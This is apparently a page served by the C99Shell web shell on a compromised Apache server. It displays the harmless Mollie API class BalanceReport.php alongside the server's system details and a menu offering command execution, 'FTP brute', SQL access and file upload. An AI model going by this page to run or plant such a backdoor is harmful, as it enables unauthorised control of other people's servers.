!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/mollie/mollie-api-php/src/Resources/   drwxr-xr-x
Free 13.09 GB of 57.97 GB (22.58%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     BalanceReport.php (2.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Mollie\Api\Resources;

class 
BalanceReport extends BaseResource
{
    
/**
     * Indicates the response contains a balance report object. Will always contain "balance-report" for this endpoint.
     *
     * @var string
     */
    
public $resource;

    
/**
     * The ID of the balance this report was generated for.
     *
     * @example bal_gVMhHKqSSRYJyPsuoPNFH
     * @var string
     */
    
public $balanceId;

    
/**
     * The time zone used for the "from" and "until" parameters.
     * Currently only time zone "Europe/Amsterdam" is supported.
     *
     *
     * @example Europe/Amsterdam
     * @var string
     */
    
public $timeZone;

    
/**
     * The start date of the report, in YYYY-MM-DD format. The "from" date is ‘inclusive’, and in Central European Time.
     * This means a report with for example "from: 2020-01-01" will include movements of "2020-01-01 0:00:00 CET" and
     * onwards.
     *
     *
     * @example 2020-01-01
     * @var string
     */
    
public $from;

    
/**
     * The end date of the report, in YYYY-MM-DD format. The "until" date is ‘exclusive’, and in Central European Time.
     * This means a report with for example "until: 2020-02-01" will include movements up
     * until "2020-01-31 23:59:59 CET".
     *
     * @var string
     */
    
public $until;

    
/**
     * You can retrieve reports in two different formats: "status-balances" or "transaction-categories".
     * With the "status-balances" format, transactions are grouped by status (e.g. "pending", "available"), then by
     * direction of movement (e.g. moved from "pending" to "available"), then by transaction type, and then by other
     * sub-groupings where available (e.g. payment method).
     * With the "transaction-categories" format, transactions are grouped by transaction type, then by direction of
     * movement, and then again by other sub-groupings where available. Both reporting formats will always contain
     * opening and closing amounts that correspond to the start and end dates of the report.
     *
     * @var string
     */
    
public $grouping;

    
/**
     * The balance report totals, structured according to the defined "grouping".
     *
     * @var \stdClass
     */
    
public $totals;

    
/**
     * Links to help navigate through the API.
     *
     * @var \stdClass
     */
    
public $_links;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.006 ]--